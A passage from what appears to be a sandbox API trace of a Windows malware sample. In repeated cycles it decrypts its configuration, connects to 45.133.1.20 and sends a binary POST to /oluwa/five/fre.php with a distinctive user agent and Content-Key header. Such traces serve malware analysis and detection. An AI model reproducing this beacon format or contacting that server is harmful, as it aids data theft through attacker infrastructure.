hHeap=0x6a0000) returned 1 [0167.438] closesocket (s=0x314) returned 0 [0167.439] GetProcessHeap () returned 0x6a0000 [0167.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0167.439] GetProcessHeap () returned 0x6a0000 [0167.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.440] GetProcessHeap () returned 0x6a0000 [0167.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.441] GetProcessHeap () returned 0x6a0000 [0167.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0167.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x694) returned 0x314 [0167.444] Sleep (dwMilliseconds=0xea60) [0167.447] GetProcessHeap () returned 0x6a0000 [0167.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0167.502] GetProcessHeap () returned 0x6a0000 [0167.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.503] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.507] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.507] GetProcessHeap () returned 0x6a0000 [0167.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.508] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.509] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.510] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0167.510] GetProcessHeap () returned 0x6a0000 [0167.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.511] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.512] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.513] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.514] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.514] GetProcessHeap () returned 0x6a0000 [0167.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0167.514] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0167.514] GetProcessHeap () returned 0x6a0000 [0167.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.515] GetProcessHeap () returned 0x6a0000 [0167.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.516] GetProcessHeap () returned 0x6a0000 [0167.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.516] GetProcessHeap () returned 0x6a0000 [0167.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0167.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.518] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0167.540] GetProcessHeap () returned 0x6a0000 [0167.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.541] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0167.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.542] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.543] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.543] GetProcessHeap () returned 0x6a0000 [0167.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.544] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0167.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.545] CryptDestroyKey (hKey=0x6ad020) returned 1 [0167.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.546] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0167.546] GetProcessHeap () returned 0x6a0000 [0167.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.547] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0167.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.548] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0167.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.549] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0167.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.550] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0167.550] GetProcessHeap () returned 0x6a0000 [0167.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0167.550] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0167.550] GetProcessHeap () returned 0x6a0000 [0167.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0167.550] socket (af=2, type=1, protocol=6) returned 0x318 [0167.551] connect (s=0x318, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0167.581] FreeAddrInfoW (pAddrInfo=0x6b9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0167.581] GetProcessHeap () returned 0x6a0000 [0167.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0167.581] GetProcessHeap () returned 0x6a0000 [0167.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0167.582] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.583] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0167.583] GetProcessHeap () returned 0x6a0000 [0167.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0167.583] GetProcessHeap () returned 0x6a0000 [0167.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.583] GetProcessHeap () returned 0x6a0000 [0167.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0167.584] GetProcessHeap () returned 0x6a0000 [0167.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0167.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.585] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0167.585] GetProcessHeap () returned 0x6a0000 [0167.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0167.586] GetProcessHeap () returned 0x6a0000 [0167.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.586] send (s=0x318, buf=0x6bbd20*, len=242, flags=0) returned 242 [0167.587] send (s=0x318, buf=0x6bb998*, len=159, flags=0) returned 159 [0167.587] GetProcessHeap () returned 0x6a0000 [0167.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0167.587] recv (in: s=0x318, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0167.652] GetProcessHeap () returned 0x6a0000 [0167.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0167.653] GetProcessHeap () returned 0x6a0000 [0167.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.653] GetProcessHeap () returned 0x6a0000 [0167.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0167.653] GetProcessHeap () returned 0x6a0000 [0167.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0167.654] closesocket (s=0x318) returned 0 [0167.655] GetProcessHeap () returned 0x6a0000 [0167.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0167.655] GetProcessHeap () returned 0x6a0000 [0167.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.655] GetProcessHeap () returned 0x6a0000 [0167.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.656] GetProcessHeap () returned 0x6a0000 [0167.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0167.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd4c) returned 0x318 [0167.660] Sleep (dwMilliseconds=0xea60) [0167.662] GetProcessHeap () returned 0x6a0000 [0167.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0167.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0167.692] GetProcessHeap () returned 0x6a0000 [0167.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.693] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.694] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.696] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.696] GetProcessHeap () returned 0x6a0000 [0167.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.698] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0167.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.699] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.703] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0167.703] GetProcessHeap () returned 0x6a0000 [0167.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.704] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.707] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.708] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.710] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.710] GetProcessHeap () returned 0x6a0000 [0167.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0167.710] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0167.710] GetProcessHeap () returned 0x6a0000 [0167.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.713] GetProcessHeap () returned 0x6a0000 [0167.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.714] GetProcessHeap () returned 0x6a0000 [0167.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.714] GetProcessHeap () returned 0x6a0000 [0167.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0167.734] GetProcessHeap () returned 0x6a0000 [0167.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.735] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0167.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.736] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.738] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.738] GetProcessHeap () returned 0x6a0000 [0167.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.740] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.741] CryptDestroyKey (hKey=0x6ad020) returned 1 [0167.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.742] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0167.742] GetProcessHeap () returned 0x6a0000 [0167.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.746] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0167.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.747] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0167.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.748] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0167.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.750] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0167.750] GetProcessHeap () returned 0x6a0000 [0167.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0167.750] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0167.750] GetProcessHeap () returned 0x6a0000 [0167.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0167.750] socket (af=2, type=1, protocol=6) returned 0x31c [0167.750] connect (s=0x31c, name=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0167.773] FreeAddrInfoW (pAddrInfo=0x6ba0b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0167.773] GetProcessHeap () returned 0x6a0000 [0167.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0167.774] GetProcessHeap () returned 0x6a0000 [0167.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0167.775] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.776] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0167.776] GetProcessHeap () returned 0x6a0000 [0167.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0167.776] GetProcessHeap () returned 0x6a0000 [0167.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.777] GetProcessHeap () returned 0x6a0000 [0167.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0167.778] GetProcessHeap () returned 0x6a0000 [0167.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0167.779] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.780] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0167.780] GetProcessHeap () returned 0x6a0000 [0167.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0167.780] GetProcessHeap () returned 0x6a0000 [0167.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.781] send (s=0x31c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0167.782] send (s=0x31c, buf=0x6bb998*, len=159, flags=0) returned 159 [0167.782] GetProcessHeap () returned 0x6a0000 [0167.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0167.782] recv (in: s=0x31c, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0167.857] GetProcessHeap () returned 0x6a0000 [0167.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0167.857] GetProcessHeap () returned 0x6a0000 [0167.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.858] GetProcessHeap () returned 0x6a0000 [0167.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0167.860] GetProcessHeap () returned 0x6a0000 [0167.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0167.860] closesocket (s=0x31c) returned 0 [0167.862] GetProcessHeap () returned 0x6a0000 [0167.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0167.862] GetProcessHeap () returned 0x6a0000 [0167.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.863] GetProcessHeap () returned 0x6a0000 [0167.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.863] GetProcessHeap () returned 0x6a0000 [0167.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0167.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 